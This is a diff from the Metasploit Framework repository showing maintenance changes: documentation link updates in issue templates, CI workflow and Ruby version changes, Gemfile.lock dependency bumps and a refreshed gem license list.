automatic module_metadata_base.json update

Land #16914 , Add PAN-OS auth command injection module (CVE-2020-2038)
Land #16998 , Fix iax2 module crash
2022-09-15 11:28:39 -05:00 · 2022-09-15 17:58:07 +02:00 · 2022-09-15 16:55:09 +01:00 · 2022-09-15 11:41:07 -04:00 · 2022-09-15 10:39:48 -05:00 · 2022-09-15 16:17:38 +01:00
397 changed files with 29743 additions and 10548 deletions
@@ -8,8 +8,8 @@ labels: "bug"
  Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
-  - Reporting a Bug: https://github.com/rapid7/metasploit-framework/wiki/Reporting-a-Bug
+  - Wiki: https://docs.metasploit.com/
+  - Reporting a Bug: https://docs.metasploit.com/docs/using-metasploit/getting-started/reporting-a-bug.html

  Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "suggestion-docs"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -33,7 +33,7 @@ Why should we document this and who will benefit from it?
 ### Draft the doc

 - [ ] Write the doc, following the format listed in these resources:
-  - [Overview on contributing module documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+  - [Overview on contributing module documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
  - [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
  - [Example of a similar article]()

@@ -8,7 +8,7 @@ labels: "suggestion-feature"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "suggestion-module"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "question"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -31,4 +31,4 @@ Complex Software Examples:
 We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

 Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
-If you wish to sanitize your pcap, please see the [wiki](https://github.com/rapid7/metasploit-framework/wiki/Sanitizing-PCAPs).
+If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
@@ -31,7 +31,7 @@ on:
 jobs:
  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
  build:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40

    strategy:
@@ -172,7 +172,7 @@ jobs:

                    This includes:

-                    - All of the item points within this [tempate](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
+                    - All of the item points within this [template](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
                    - The result of the \`debug\` command in your Metasploit console
                    - Screenshots showing the issues you're having
                    - Exact replication steps
@@ -28,14 +28,14 @@ on:

 jobs:
  msftidy:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40

    strategy:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
+          - 2.7

    name: Lint msftidy
    steps:
@@ -28,7 +28,7 @@ on:

 jobs:
  build:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40
    name: Docker Build
    steps:
@@ -44,7 +44,7 @@ jobs:
          /usr/bin/docker-compose build

  test:
-    runs-on: ubuntu-18.04
+    runs-on: ${{ matrix.os }}
    timeout-minutes: 40

    services:
@@ -64,10 +64,15 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
          - 2.7
-          - 3.0.3
-          - 3.1.1
+          - 3.0
+          - 3.1
+        os:
+          - ubuntu-20.04
+          - ubuntu-latest
+        exclude:
+          - { os: ubuntu-latest, ruby: 2.7 }
+          - { os: ubuntu-latest, ruby: 3.0 }
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
@@ -78,7 +83,7 @@ jobs:
    env:
      RAILS_ENV: test

-    name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
      - name: Install system dependencies
        run: sudo apt-get install libpcap-dev graphviz
@@ -3,6 +3,8 @@ Gemfile.local
 Gemfile.local.lock
 # Rubymine project directory
 .idea
+# Visual Studio Code configuration settings directory
+.vscode
 # Sublime Text project directory (not created by ST by default)
 .sublime-project
 # RVM control file, keep this to avoid backdooring Metasploit
@@ -15,7 +15,8 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  gem 'pry-byebug'
+  # lock to version with 2.6 support until project updates
+  gem 'pry-byebug', "~> 3.9.0"
  # module documentation
  gem 'octokit'
  # memory profiling
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.0)
+    metasploit-framework (6.2.18)
      actionpack (~> 6.0)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -18,6 +18,7 @@ PATH
      eventmachine
      faker
      faraday
+      faraday-retry
      faye-websocket
      filesize
      hrr_rb_ssh-ed25519
@@ -29,7 +30,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.87)
+      metasploit-payloads (= 2.0.94)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.18)
      mqtt
@@ -41,7 +42,7 @@ PATH
      network_interface
      nexpose
      nokogiri
-      octokit
+      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
      packetfu
@@ -54,7 +55,6 @@ PATH
      rb-readline
      recog
      redcarpet
-      reline (= 0.2.5)
      rex-arch
      rex-bin_tools
      rex-core
@@ -74,7 +74,7 @@ PATH
      rex-text
      rex-zip
      ruby-macho
-      ruby_smb (~> 3.1.0)
+      ruby_smb (~> 3.2.0)
      rubyntlm
      rubyzip
      sinatra
@@ -97,57 +97,57 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (6.1.6)
-      actionview (= 6.1.6)
-      activesupport (= 6.1.6)
+    actionpack (6.1.7)
+      actionview (= 6.1.7)
+      activesupport (= 6.1.7)
      rack (~> 2.0, >= 2.0.9)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (6.1.6)
-      activesupport (= 6.1.6)
+    actionview (6.1.7)
+      activesupport (= 6.1.7)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (6.1.6)
-      activesupport (= 6.1.6)
-    activerecord (6.1.6)
-      activemodel (= 6.1.6)
-      activesupport (= 6.1.6)
-    activesupport (6.1.6)
+    activemodel (6.1.7)
+      activesupport (= 6.1.7)
+    activerecord (6.1.7)
+      activemodel (= 6.1.7)
+      activesupport (= 6.1.7)
+    activesupport (6.1.7)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
      zeitwerk (~> 2.3)
-    addressable (2.8.0)
-      public_suffix (>= 2.0.2, < 5.0)
+    addressable (2.8.1)
+      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.588.0)
-    aws-sdk-core (3.131.0)
+    aws-partitions (1.628.0)
+    aws-sdk-core (3.145.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.525.0)
      aws-sigv4 (~> 1.1)
-      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.315.0)
+      jmespath (~> 1, >= 1.6.1)
+    aws-sdk-ec2 (1.331.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.68.0)
+    aws-sdk-iam (1.70.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.57.0)
+    aws-sdk-kms (1.58.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-s3 (1.114.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
-    aws-sigv4 (1.5.0)
+    aws-sigv4 (1.5.1)
      aws-eventstream (~> 1, >= 1.0.2)
    bcrypt (3.1.18)
    bcrypt_pbkdf (1.1.0)
@@ -176,38 +176,21 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.10.0)
+    erubi (1.11.0)
    eventmachine (1.2.7)
    factory_bot (6.2.1)
      activesupport (>= 5.0.0)
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (2.21.0)
+    faker (2.23.0)
      i18n (>= 1.8.11, < 2)
-    faraday (1.10.0)
-      faraday-em_http (~> 1.0)
-      faraday-em_synchrony (~> 1.0)
-      faraday-excon (~> 1.1)
-      faraday-httpclient (~> 1.0)
-      faraday-multipart (~> 1.0)
-      faraday-net_http (~> 1.0)
-      faraday-net_http_persistent (~> 1.0)
-      faraday-patron (~> 1.0)
-      faraday-rack (~> 1.0)
-      faraday-retry (~> 1.0)
+    faraday (2.5.2)
+      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
-    faraday-em_http (1.0.0)
-    faraday-em_synchrony (1.0.0)
-    faraday-excon (1.1.0)
-    faraday-httpclient (1.0.1)
-    faraday-multipart (1.0.3)
-      multipart-post (>= 1.2, < 3)
-    faraday-net_http (1.0.1)
-    faraday-net_http_persistent (1.2.0)
-    faraday-patron (1.0.0)
-    faraday-rack (1.0.0)
-    faraday-retry (1.0.3)
+    faraday-net_http (3.0.0)
+    faraday-retry (2.0.0)
+      faraday (~> 2.0)
    faye-websocket (0.11.1)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
@@ -224,21 +207,21 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.4)
+    http-cookie (1.0.5)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.10.0)
+    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
    io-console (0.5.11)
-    irb (1.3.6)
-      reline (>= 0.2.5)
+    irb (1.4.1)
+      reline (>= 0.3.0)
    jmespath (1.6.1)
    jsobfu (0.4.2)
      rkelly-remix
    json (2.6.2)
    little-plugger (1.1.4)
-    logging (2.3.0)
+    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
    loofah (2.18.0)
@@ -246,11 +229,11 @@ GEM
      nokogiri (>= 1.5.9)
    memory_profiler (1.0.0)
    metasm (1.0.5)
-    metasploit-concern (4.0.4)
+    metasploit-concern (4.0.5)
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-credential (5.0.7)
+    metasploit-credential (5.0.9)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -260,11 +243,11 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (4.0.4)
+    metasploit-model (4.0.6)
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-payloads (2.0.87)
+    metasploit-payloads (2.0.94)
    metasploit_data_models (5.0.5)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -278,39 +261,38 @@ GEM
    metasploit_payloads-mettle (1.0.18)
    method_source (1.0.0)
    mini_portile2 (2.8.0)
-    minitest (5.15.0)
+    minitest (5.16.3)
    mqtt (0.5.0)
-    msgpack (1.5.1)
+    msgpack (1.5.6)
    multi_json (1.15.0)
-    multipart-post (2.1.1)
-    mustermann (1.1.1)
+    mustermann (2.0.2)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-ldap (0.17.0)
+    net-ldap (0.17.1)
    net-protocol (0.1.3)
      timeout
    net-smtp (0.3.1)
      digest
      net-protocol
      timeout
-    net-ssh (6.1.0)
+    net-ssh (7.0.1)
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.13.6)
+    nokogiri (1.13.8)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
-    octokit (4.22.0)
-      faraday (>= 0.9)
-      sawyer (~> 0.8.0, >= 0.5.3)
-    openssl-ccm (1.2.2)
-    openssl-cmac (2.0.1)
+    octokit (4.25.1)
+      faraday (>= 1, < 3)
+      sawyer (~> 0.9)
+    openssl-ccm (1.2.3)
+    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
    parallel (1.22.1)
-    parser (3.1.2.0)
+    parser (3.1.2.1)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
@@ -320,30 +302,30 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.3.5)
+    pg (1.4.3)
    pry (0.13.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.9.0)
      byebug (~> 11.0)
      pry (~> 0.13.0)
-    public_suffix (4.0.7)
-    puma (5.6.4)
+    public_suffix (5.0.0)
+    puma (5.6.5)
      nio4r (~> 2.0)
    racc (1.6.0)
-    rack (2.2.3)
-    rack-protection (2.2.0)
+    rack (2.2.4)
+    rack-protection (2.2.2)
      rack
-    rack-test (1.1.0)
-      rack (>= 1.0, < 3)
+    rack-test (2.0.2)
+      rack (>= 1.3)
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.2)
+    rails-html-sanitizer (1.4.3)
      loofah (~> 2.3)
-    railties (6.1.6)
-      actionpack (= 6.1.6)
-      activesupport (= 6.1.6)
+    railties (6.1.7)
+      actionpack (= 6.1.7)
+      activesupport (= 6.1.7)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
@@ -353,8 +335,8 @@ GEM
    recog (2.3.23)
      nokogiri
    redcarpet (3.5.1)
-    regexp_parser (2.4.0)
-    reline (0.2.5)
+    regexp_parser (2.5.0)
+    reline (0.3.1)
      io-console (~> 0.5)
    rex-arch (0.1.14)
      rex-text
@@ -369,7 +351,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.30)
+    rex-exploitation (0.1.36)
      jsobfu
      metasm
      rex-arch
@@ -383,25 +365,25 @@ GEM
      rex-arch
    rex-ole (0.1.7)
      rex-text
-    rex-powershell (0.1.96)
+    rex-powershell (0.1.97)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.8)
+    rex-random_identifier (0.1.9)
      rex-text
    rex-registry (0.1.4)
    rex-rop_builder (0.1.4)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.39)
+    rex-socket (0.1.42)
      rex-core
-    rex-sslscan (0.1.7)
+    rex-sslscan (0.1.8)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.37)
+    rex-text (0.2.45)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -412,7 +394,7 @@ GEM
      rspec-mocks (~> 3.11.0)
    rspec-core (3.11.0)
      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.0)
+    rspec-expectations (3.11.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.11.0)
    rspec-mocks (3.11.1)
@@ -428,24 +410,25 @@ GEM
      rspec-support (~> 3.10)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.11.0)
-    rubocop (1.29.1)
+    rspec-support (3.11.1)
+    rubocop (1.36.0)
+      json (~> 2.3)
      parallel (~> 1.10)
-      parser (>= 3.1.0.0)
+      parser (>= 3.1.2.1)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.17.0, < 2.0)
+      rubocop-ast (>= 1.20.1, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.18.0)
+    rubocop-ast (1.21.0)
      parser (>= 3.1.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.1.3)
+    ruby_smb (3.2.0)
      bindata
      openssl-ccm
      openssl-cmac
@@ -453,21 +436,22 @@ GEM
      windows_error (>= 0.1.4)
    rubyntlm (0.6.3)
    rubyzip (2.3.2)
-    sawyer (0.8.2)
+    sawyer (0.9.2)
      addressable (>= 2.3.5)
-      faraday (> 0.8, < 2.0)
+      faraday (>= 0.17.3, < 3)
    simplecov (0.18.2)
      docile (~> 1.1)
      simplecov-html (~> 0.11)
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (2.2.0)
-      mustermann (~> 1.0)
+    sinatra (2.2.2)
+      mustermann (~> 2.0)
      rack (~> 2.2)
-      rack-protection (= 2.2.0)
+      rack-protection (= 2.2.2)
      tilt (~> 2.0)
-    sqlite3 (1.4.2)
+    sqlite3 (1.5.0)
+      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    swagger-blocks (3.0.0)
    thin (1.8.1)
@@ -475,18 +459,18 @@ GEM
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.2.1)
-    tilt (2.0.10)
+    tilt (2.0.11)
    timecop (0.9.5)
-    timeout (0.2.0)
+    timeout (0.3.0)
    ttfunk (1.7.0)
-    tzinfo (2.0.4)
+    tzinfo (2.0.5)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2022.1)
+    tzinfo-data (1.2022.3)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
-    unf_ext (0.0.8.1)
-    unicode-display_width (2.1.0)
+    unf_ext (0.0.8.2)
+    unicode-display_width (2.2.0)
    unix-crypt (1.3.0)
    warden (1.2.9)
      rack (>= 2.0.9)
@@ -510,9 +494,9 @@ GEM
      activesupport (>= 4.2, < 8.0)
    xmlrpc (0.3.2)
      webrick
-    yard (0.9.27)
+    yard (0.9.28)
      webrick (~> 1.7.0)
-    zeitwerk (2.5.4)
+    zeitwerk (2.6.0)

 PLATFORMS
  ruby
@@ -523,7 +507,7 @@ DEPENDENCIES
  memory_profiler
  metasploit-framework!
  octokit
-  pry-byebug
+  pry-byebug (~> 3.9.0)
  rake
  redcarpet
  rspec-rails
@@ -1,23 +1,23 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 6.1.6, MIT
-actionview, 6.1.6, MIT
-activemodel, 6.1.6, MIT
-activerecord, 6.1.6, MIT
-activesupport, 6.1.6, MIT
-addressable, 2.8.0, "Apache 2.0"
+actionpack, 6.1.6.1, MIT
+actionview, 6.1.6.1, MIT
+activemodel, 6.1.6.1, MIT
+activerecord, 6.1.6.1, MIT
+activesupport, 6.1.6.1, MIT
+addressable, 2.8.1, "Apache 2.0"
 afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.587.0, "Apache 2.0"
-aws-sdk-core, 3.130.2, "Apache 2.0"
-aws-sdk-ec2, 1.314.0, "Apache 2.0"
-aws-sdk-iam, 1.68.0, "Apache 2.0"
-aws-sdk-kms, 1.56.0, "Apache 2.0"
+aws-partitions, 1.624.0, "Apache 2.0"
+aws-sdk-core, 3.137.0, "Apache 2.0"
+aws-sdk-ec2, 1.329.0, "Apache 2.0"
+aws-sdk-iam, 1.70.0, "Apache 2.0"
+aws-sdk-kms, 1.58.0, "Apache 2.0"
 aws-sdk-s3, 1.114.0, "Apache 2.0"
-aws-sigv4, 1.5.0, "Apache 2.0"
-bcrypt, 3.1.17, MIT
+aws-sigv4, 1.5.1, "Apache 2.0"
+bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
 bindata, 2.4.10, ruby
 bson, 4.15.0, "Apache 2.0"
@@ -37,22 +37,14 @@ domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
-erubi, 1.10.0, MIT
+erubi, 1.11.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 2.20.0, MIT
-faraday, 1.10.0, MIT
-faraday-em_http, 1.0.0, MIT
-faraday-em_synchrony, 1.0.0, MIT
-faraday-excon, 1.1.0, MIT
-faraday-httpclient, 1.0.1, MIT
-faraday-multipart, 1.0.3, MIT
-faraday-net_http, 1.0.1, MIT
-faraday-net_http_persistent, 1.2.0, MIT
-faraday-patron, 1.0.0, MIT
-faraday-rack, 1.0.0, MIT
-faraday-retry, 1.0.3, MIT
+faker, 2.22.0, MIT
+faraday, 2.5.2, MIT
+faraday-net_http, 3.0.0, MIT
+faraday-retry, 2.0.0, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
 filesize, 0.2.0, MIT
@@ -62,79 +54,78 @@ gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.4, MIT
+http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.10.0, MIT
+i18n, 1.12.0, MIT
 io-console, 0.5.11, "ruby, Simplified BSD"
-irb, 1.3.6, "ruby, Simplified BSD"
+irb, 1.4.1, "ruby, Simplified BSD"
 jmespath, 1.6.1, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.6.1, ruby
+json, 2.6.2, ruby
 little-plugger, 1.1.4, MIT
-logging, 2.3.0, MIT
+logging, 2.3.1, MIT
 loofah, 2.18.0, MIT
 memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.4, "New BSD"
-metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.1.44, "New BSD"
-metasploit-model, 4.0.4, "New BSD"
-metasploit-payloads, 2.0.87, "3-clause (or ""modified"") BSD"
+metasploit-credential, 5.0.8, "New BSD"
+metasploit-framework, 6.2.18, "New BSD"
+metasploit-model, 4.0.6, "New BSD"
+metasploit-payloads, 2.0.94, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
 metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.0, MIT
-minitest, 5.15.0, MIT
+minitest, 5.16.3, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.5.1, "Apache 2.0"
+msgpack, 1.5.6, "Apache 2.0"
 multi_json, 1.15.0, MIT
-multipart-post, 2.1.1, MIT
-mustermann, 1.1.1, MIT
+mustermann, 2.0.2, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.17.0, MIT
+net-ldap, 0.17.1, MIT
 net-protocol, 0.1.3, "ruby, Simplified BSD"
 net-smtp, 0.3.1, "ruby, Simplified BSD"
-net-ssh, 6.1.0, MIT
+net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.13.6, MIT
+nokogiri, 1.13.8, MIT
 nori, 2.6.0, MIT
-octokit, 4.22.0, MIT
-openssl-ccm, 1.2.2, MIT
-openssl-cmac, 2.0.1, MIT
+octokit, 4.25.1, MIT
+openssl-ccm, 1.2.3, MIT
+openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.22.1, MIT
-parser, 3.1.2.0, MIT
+parser, 3.1.2.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.10.0, MIT
-pg, 1.3.5, "Simplified BSD"
+pg, 1.4.3, "Simplified BSD"
 pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
-public_suffix, 4.0.7, MIT
-puma, 5.6.4, "New BSD"
+public_suffix, 5.0.0, MIT
+puma, 5.6.5, "New BSD"
 racc, 1.6.0, "ruby, Simplified BSD"
-rack, 2.2.3, MIT
-rack-protection, 2.2.0, MIT
-rack-test, 1.1.0, MIT
+rack, 2.2.4, MIT
+rack-protection, 2.2.2, MIT
+rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.2, MIT
-railties, 6.1.6, MIT
+rails-html-sanitizer, 1.4.3, MIT
+railties, 6.1.6.1, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rb-readline, 0.5.5, BSD
 recog, 2.3.23, unknown
 redcarpet, 3.5.1, MIT
-regexp_parser, 2.4.0, MIT
-reline, 0.2.5, ruby
+regexp_parser, 2.5.0, MIT
+reline, 0.3.1, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
 rex-core, 0.1.28, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.30, "New BSD"
+rex-exploitation, 0.1.35, "New BSD"
 rex-java, 0.1.6, "New BSD"
 rex-mime, 0.1.7, "New BSD"
 rex-nop, 0.1.2, "New BSD"
@@ -143,10 +134,10 @@ rex-powershell, 0.1.96, "New BSD"
 rex-random_identifier, 0.1.8, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.39, "New BSD"
+rex-socket, 0.1.41, "New BSD"
 rex-sslscan, 0.1.7, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.37, "New BSD"
+rex-text, 0.2.45, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
@@ -157,35 +148,35 @@ rspec-mocks, 3.11.1, MIT
 rspec-rails, 5.1.2, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.11.0, MIT
-rubocop, 1.29.1, MIT
-rubocop-ast, 1.17.0, MIT
+rubocop, 1.35.1, MIT
+rubocop-ast, 1.21.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.1.2, "New BSD"
+ruby_smb, 3.2.0, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
-sawyer, 0.8.2, MIT
+sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 2.2.0, MIT
-sqlite3, 1.4.2, "New BSD"
+sinatra, 2.2.2, MIT
+sqlite3, 1.4.4, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
-tilt, 2.0.10, MIT
+tilt, 2.0.11, MIT
 timecop, 0.9.5, MIT
-timeout, 0.2.0, "ruby, Simplified BSD"
+timeout, 0.3.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 2.0.4, MIT
-tzinfo-data, 1.2022.1, MIT
+tzinfo, 2.0.5, MIT
+tzinfo-data, 1.2022.3, MIT
 unf, 0.1.4, "2-clause BSDL"
-unf_ext, 0.0.8.1, MIT
-unicode-display_width, 2.1.0, MIT
+unf_ext, 0.0.8.2, MIT
+unicode-display_width, 2.2.0, MIT
 unix-crypt, 1.3.0, BSD
 warden, 1.2.9, MIT
 webrick, 1.7.0, "ruby, Simplified BSD"
@@ -196,5 +187,5 @@ windows_error, 0.1.4, BSD
